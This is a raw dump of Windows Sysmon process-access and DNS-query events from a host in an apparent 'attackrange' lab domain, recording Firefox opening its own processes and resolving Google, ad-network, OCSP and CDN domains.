Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.773{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.773{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.748{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.748{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.746{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.744{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.740{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.739{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.293{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.292{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000018238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:22.027{59A5CD1D-945A-6005-3305-00000000A301}7052iamtheproudownerofthelongestlongestlongestdomainnameinthisworld.com0166.62.107.20;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:22.026{59A5CD1D-945A-6005-3305-00000000A301}7052iamtheproudownerofthelongestlongestlongestdomainnameinthisworld.com0::ffff:166.62.107.20;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000018277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.824{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.823{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla 
Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.605{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.600{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program 
Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.599{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla 
Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.579{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000018271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.342{59A5CD1D-945A-6005-3305-00000000A301}7052www-google-analytics.l.google.com02a00:1450:4001:803::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.341{59A5CD1D-945A-6005-3305-00000000A301}7052www-google-analytics.l.google.com0172.217.23.174;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.340{59A5CD1D-945A-6005-3305-00000000A301}7052www.google-analytics.com0type: 5 www-google-analytics.l.google.com;::ffff:172.217.23.174;C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000018268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.186{59A5CD1D-8E56-6005-2E00-00000000A301}246420.107.62.166.in-addr.arpa.0type: 12 ip-166-62-107-20.ip.secureserver.net;C:\Windows\sysmon64.exe 22542200x800000000000000018267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.184{59A5CD1D-8E56-6005-2E00-00000000A301}246422.249.124.192.in-addr.arpa.0type: 12 cloudproxy10022.sucuri.net;C:\Windows\sysmon64.exe 22542200x800000000000000018266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.140{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.starfieldtech.com0type: 5 ocsp.godaddy.com.akadns.net;::ffff:192.124.249.24;::ffff:192.124.249.36;::ffff:192.124.249.41;::ffff:192.124.249.22;::ffff:192.124.249.23;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.114{59A5CD1D-945A-6005-3305-00000000A301}7052secureservercdn.net02a02:fe80:1010::16;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.112{59A5CD1D-945A-6005-3305-00000000A301}7052secureservercdn.net0192.124.249.16;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.112{59A5CD1D-945A-6005-3305-00000000A301}7052fonts.googleapis.com0172.217.22.74;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.111{59A5CD1D-945A-6005-3305-00000000A301}7052fonts.googleapis.com0::ffff:172.217.22.74;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:24.111{59A5CD1D-945A-6005-3305-00000000A301}7052secureservercdn.net0::ffff:192.124.249.16;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:23.809{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.godaddy.com.akadns.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:23.807{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.godaddy.com.akadns.net0192.124.249.23;192.124.249.24;192.124.249.36;192.124.249.41;192.124.249.22;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:23.807{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.godaddy.com0type: 5 ocsp.godaddy.com.akadns.net;::ffff:192.124.249.22;::ffff:192.124.249.23;::ffff:192.124.249.24;::ffff:192.124.249.36;::ffff:192.124.249.41;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:22.032{59A5CD1D-945A-6005-3305-00000000A301}7052iamtheproudownerofthelongestlongestlongestdomainnameinthisworld.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000018281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.159{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.151{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.129{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.119{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000018297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.014{59A5CD1D-945A-6005-3305-00000000A301}7052s0-2mdn-net.l.google.com02a00:1450:4001:800::2006;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.013{59A5CD1D-945A-6005-3305-00000000A301}7052pagead.l.doubleclick.net0216.58.206.2;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 